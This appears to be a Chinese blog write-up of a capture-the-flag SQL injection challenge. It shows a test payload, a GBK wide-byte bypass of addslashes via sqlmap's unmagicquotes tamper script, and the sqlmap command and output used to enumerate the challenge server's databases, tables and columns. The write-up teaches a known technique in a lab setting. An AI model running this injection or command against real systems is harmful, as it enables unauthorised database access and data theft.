sql injection 3南邮 ctf

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1

点进去就两句话,这么单调就先让我们看看html



好了。。。什么都没有

仔细一看,发现只有url里面可以注入了

随手一个 1'and'1'='1 上去



问题已经出来了哈,引号变成反斜杠了

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1

其实从连接上也能看出来是 SQL-GBK了

sqlmap走一趟

这个时侯就要用另一个脚本了

脚本名:unmagicquotes.py

作用:宽字符绕过 GPC addslashes12345

Example:* Input: 1′ AND 1=1* Output: 1%bf%27 AND 1=1–%20

sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3 --tamper unmagicquotes --dbs

结果

available databases [2]:

[*] `sae-chinalover`

[*] information_schema


我们选择`sae-chinalover`

继续跑,相比于第一次,这次明显快很多

Database: sae-chinalover [5 tables]

+------+

| ctf |

| ctf2 |

| ctf3 |

| ctf4 |

| news |

+------+



很明显了,答案就在这几个里面

sqlmap跑

Database: sae-chinalover

Table: ctf2

[2 columns]

+---------+-------------+

| Column  | Type        |

+---------+-------------+

| content | non-numeric |

| id      | numeric    |

+---------+-------------+

别问我为什么跑ctf2,因为我已经跑完了。。

完了

服务器打不开了。。。。

不是封了我ip就是崩了



在注入题中,先手工一下,探探waf基本过滤规则,然后自行判断

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容